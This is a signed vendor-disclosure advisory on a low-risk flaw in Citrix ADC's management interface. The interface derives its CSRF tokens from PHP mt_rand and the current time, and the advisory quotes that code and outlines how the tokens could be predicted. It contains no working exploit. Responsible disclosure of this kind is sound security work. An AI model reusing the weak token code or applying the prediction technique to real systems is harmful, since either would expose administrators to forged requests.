-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2020-021 Product: ADC/NetScaler Manufacturer: Citrix Tested Version(s): NS13.0 52.24 Vulnerability Type: Use of Cryptographically Weak Pseudo-Random Number Generator (CWE-338) Risk Level: Low Solution Status: Open Manufacturer Notification: 2020-05-06 Public Disclosure: 2020-10-02 CVE Reference: None assigned Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: NetScaler/Citrix ADC is a multi-protocol reverse proxy appliance, commonly used to externally provide Citrix Remote Desktop Services or SSL VPN. The manufacturer describes the product as follows (see [1]): "Citrix ADC is the most comprehensive application delivery and load balancing solution for monolithic and microservices-based applications. Which means you can deliver a better user experience, on any device—anywhere." Due to the use of a weak random number generator, the Citrix ADC management web interface may be vulnerable to cross-site request forgery (CSRF) attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Citrix ADC management web interface is generating custom anti-CSRF token values (rand/rand_key) using the following code: list($usec, $sec) = explode(" ", microtime()); $time_in_micro_seconds = number_format((double) $sec + (double) $usec, 6, ".", ""); strval(mt_rand()) . "." . strval(preg_replace("/\./", "", $time_in_micro_seconds)); Neither the current time nor the output of PHP's mt_rand are suitable, unpredictable values for such a security-sensitive function. The mt_rand generator is implicitly seeded on each request based on time, process ID, and a value from PHP's internal linear congruent generator. When observing enough outputs, an attacker may be able to recover the LCGs internal state [4, 5] and therefore predict the seed, the mt_rand outputs, and ultimately the used CSRF tokens. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Use a properly seeded cryptographic pseudo-random number generator (CSPRNG) to generate unpredictable CSRF tokens. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-05-04: Vulnerability discovered 2020-05-06: Vulnerability reported to manufacturer 2020-06-03: Vendor assessment, considered a low priority defense-in-depth issue 2020-10-02: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Website for Citrix ADC https://www.citrix.com/products/citrix-adc/ [2] SySS Security Advisory SYSS-2020-021 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-021.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [4] PHP mt_rand() seed cracker https://www.openwall.com/php_mt_seed [5] PRNG: Pwning Random Number Generators https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAl927T8ACgkQdo7+K7Pl Pdp+vgf+Omb3kFFeOsAxFEZmh4Hsghu7i40RcsGa8mQBjRzGLTVy+8JtUp9wyFXn JfRlFBVjwQZjdvFPY05JtcNgrUQ/4s+XPWXp08jl58+ZGDNRFgYqADbjw3cpikxM psJ0pYE1XsYu0VCqQLXVSlsRuBODfdhmAFmiIf84qg8YroLcFNPnWQaAXd22t9VE homCOf0+xLs/ezXgG0zubmiUmW0fqvmvrdvOU3IoAWBicfy7D+88bfWgRRba3XvM RS6rzqOL+fX+aVywqcDhtDEjdk9S+Ku8PJcTF9COvQSZbNpynAUd00h13ZDjI5mC 8Y1ju2RxBRAU+HQE8YX+7P1IHg7Kcg== =4nv8 -----END PGP SIGNATURE-----